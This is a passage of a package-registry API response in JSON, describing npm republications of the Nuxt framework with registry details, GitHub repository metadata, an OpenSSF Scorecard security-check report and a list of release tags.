n_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@depup%2Fnuxt/codemeta","maintainers":[{"uuid":"chiefmikey","login":"chiefmikey","name":null,"email":"wolfemikl@gmail.com","url":null,"packages_count":2064,"html_url":"https://www.npmjs.com/~chiefmikey","role":null,"created_at":"2026-02-13T18:02:44.689Z","updated_at":"2026-02-13T18:02:44.689Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/chiefmikey/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8261085,"name":"@axxy/nuxt","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"axxy","versions_count":1,"first_release_published_at":"2023-09-11T13:34:10.986Z","latest_release_published_at":"2023-09-11T13:34:10.986Z","latest_release_number":"3.7.1","last_synced_at":"2026-05-11T01:23:05.801Z","created_at":"2023-09-11T13:35:12.938Z","updated_at":"2026-05-11T01:23:05.801Z","registry_url":"https://www.npmjs.com/package/@axxy/nuxt","install_command":"npm install @axxy/nuxt","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.7.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-03-08T01:46:38.000Z","size":134889,"stargazers_count":59805,"open_issues_count":899,"forks_count":5552,"subscribers_count":783,"default_branch":"main","last_synced_at":"2026-03-08T02:06:38.003Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-03-08T01:51:09.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":313,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30271508,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-08T19:37:39.917Z","status":"ssl_error","status_checked_at":"2026-03-08T19:37:23.566Z","response_time":56,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":63,"last_synced_at":"2026-03-04T21:28:26.605Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":117764,"followers":4575,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-03-04T21:28:26.605Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v